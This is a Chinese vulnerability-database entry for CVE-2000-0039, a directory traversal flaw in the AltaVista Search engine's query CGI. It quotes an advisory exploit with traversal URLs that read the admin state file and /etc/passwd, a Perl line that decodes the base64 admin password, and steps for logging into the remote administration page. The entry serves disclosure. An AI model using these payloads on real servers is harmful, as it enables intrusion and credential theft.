AltaVista搜索引擎目录遍历漏洞

AltaVista搜索引擎目录遍历漏洞

漏洞ID 1105665 漏洞类型 输入验证
发布时间 1999-12-29 更新时间 2005-05-02
图片[1]-AltaVista搜索引擎目录遍历漏洞-安全小百科CVE编号 CVE-2000-0039
图片[2]-AltaVista搜索引擎目录遍历漏洞-安全小百科CNNVD-ID CNNVD-199912-102
漏洞平台 Unix CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19694
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-102
|漏洞详情
query.cgiCGI项目中存在AltaVista搜索引擎目录遍历漏洞,远程攻击者借助a..(dotdot)读取文档根以上的文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/896/info

The AltaVista Search engine sets up a webserver at port 9000 to listen for search queries. The main search function will accept a single '../' string in the query, providing access to all documents in the 'http' directory one level up. These documents contain various administrative information, including the password for the remote administration utility. The password is base-64 encoded, and can be easily restored to plaintext to give an attacker full remote administration abilities for the search engine. The webserver will accept multiple '../' strings if they are hex encoded, ie '%2e%2e%2f'.

http://target:9000/cgi-bin/query?mss=../logs/mgtstate
(to get the mgtstate file.)

#!/usr/bin/perl
use MIME::Base64;
print decode_base64("$ARGV[0]"), "n";
(to unencode the username/password)

http://target:9000/cgi-bin/mgt
and enter the username/password to access the remote administration features

or
http://target:9000/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
to get the password file on a unix system
|参考资料

来源:BID
名称:896
链接:http://www.securityfocus.com/bid/896
来源:OSVDB
名称:15
链接:http://www.osvdb.org/15

相关推荐: Solaris libvolmgt.so.1 (volume management, eject, fdformat) Vulnerability

Solaris libvolmgt.so.1 (volume management, eject, fdformat) Vulnerability 漏洞ID 1105114 漏洞类型 Boundary Condition Error 发布时间 1997-04-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享